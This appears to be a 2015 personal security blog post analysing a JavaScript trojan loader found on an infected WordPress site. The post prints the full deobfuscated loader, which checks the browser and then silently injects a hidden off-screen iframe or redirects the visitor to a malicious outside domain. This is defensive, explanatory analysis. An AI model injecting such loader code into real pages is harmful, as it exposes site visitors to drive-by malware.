Unfortunate encounter with Trojan.JS.Agent.KX

Tuesday, November 17. 2015

I was surfing the other day, and suddenly ding-ding-ding, a warning! I wasn't looking for trouble, but trouble found me, again.

That box makes appearances rarely, but typically I know about it's going to happen. This time I didn't expect that. The site I went to was just a regular one, not one that in any normal circumstances would raise any red flags. My automatic second thought was "a false positive", but there it was:

Based on the scanning reports, it looks like all of the static JavaScript files on that site were infected. A closer look into a file:

function null_check() {
    var e = "none";
    if ("none" != e) {
        var t = document.getElementById(e);
        void 0 != typeof t && null != t && (t.outerHTML = "", delete t)
    }
}

function browser_version_check() {
    return document.all && !document.compatMode ? !0 :
        document.all && !window.XMLHttpRequest ? !0 :
        document.all && !document.querySelector ? !0 :
        document.all && !document.addEventListener ? !0 :
        document.all && !window.atob ? !0 :
        document.all ? !0 :
        "undefined" != typeof navigator.maxTouchPoints &&
            !document.all &&
            ie_check() ? !0 : !1
}

function ie_check() {
    var e = window.navigator.userAgent,
        t = e.indexOf("MSIE ");
    if (t > 0) return parseInt(e.substring(t + 5, e.indexOf(".", t)), 10);
    var i = e.indexOf("Trident/");
    if (i > 0) {
        var n = e.indexOf("rv:");
        return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10)
    }
    var o = e.indexOf("Edge/");
    return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1
}

function user_agent_check() {
    var e = window.navigator.userAgent.toLowerCase();
    return /(android|bb\d+|meego).+mobile|/i.test(e.substr(0, 4)) ? !0 : !1
}
var intervalTimer = setInterval(function() {
    if (null != document.body && "undefined" != typeof document.body) {
        if (clearInterval(intervalTimer), "undefined" == typeof window.loaded_into_this_window) {
            window.loaded_into_this_window = 1;
            var e = ie_check() && browser_version_check(),
                t = !e && !!window.chrome && "Google Inc." === window.navigator.vendor,
                i = -1,
                n = "http://hjjdgwtwgfgfdg.tk/052F";
            if (user_agent_check() && 1 == i)
                navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ?
                    location.replace(n) : (window.location = n, document.location = n);
            else if (e && !t && !user_agent_check()) {
                var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' +
                            n + '" height="10px"></iframe></div>',
                    a = document.getElementsByTagName("div");
                if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o;
                else {
                    var d = a.length,
                        r = Math.floor(d / 2);
                    a[r].innerHTML = a[r].innerHTML + o
                }
            }
        }
        null_check()
    }
}, 100);

Quite simple piece of code. It was heavily packed, so I beautified it and renamed the obfuscated function names and variables. The regexp for user agent detection was a mile long, so I shortened it by about 2000 characters. Anyway, the basic functionality of the code is to create a timer for 100 milliseconds, which when triggered on a non-mobile client create a hidden IFRAME 3532 pixels left of the user agent's viewport containing web page from http://hjjdgwtwgfgfdg.tk/052F ... which to my disappointment was already taken down. So, I didn't get to see what the actual payload was. The above code is only a loader, a means to lure the actual trojan into your box. I guess it would contain some sort of exploit in it, but as I said: some nice person already took that domain down.

How the trojan loader was injected was a no-brainer. A simple HTTP-request for /readme.html indicated, that the site was running WordPress 4.3.1, which at the time of investigating was the latest stable release. The server is running a Debian 6, a way outdated Linux distro released in February 2011 reaching end-of-life in couple of months. The thing is: Wordpress is a leaky bucket having constant flow of security alerts. Also, I know for a fact, that Debian 6 also has couple of holes here and there. So, points of entry are available for those automated bots injecting the loaders.

Anyway, I ended my investigation happy. My own box reacted as it should and the threat had been taken down already. Also the site in question was taken off-line in a couple of hours after me filing an abuse report to their ISP. All was good for a brief time ... until next incident occurs. :-)

by Jari Turkia in Security at 19:40 | Comments (0) | Share in LinkedIn
(Page 1 of 1, totaling 1 entries)

Calendar

Mon Tue Wed Thu Fri Sat Sun
Back November '15 Forward
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30            

Quicksearch

Archives

Categories

RSS feeds of this Blog

Blog Administration

Open login screen

Powered by

Parts of this serendipity template are by Abdussamad Abdurrazzaq and Jari Turkia. License